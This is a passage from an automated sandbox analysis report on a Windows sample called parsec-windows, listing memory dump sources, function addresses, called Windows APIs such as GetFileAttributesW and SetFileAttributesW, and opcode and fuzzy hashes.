                                • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                • String ID:
                                • API String ID: 2547128583-0
                                • Opcode ID: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
                                • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                • Opcode Fuzzy Hash: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
                                • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                Function 00406008 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                Download Yara Rule
                                APIs
                                • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98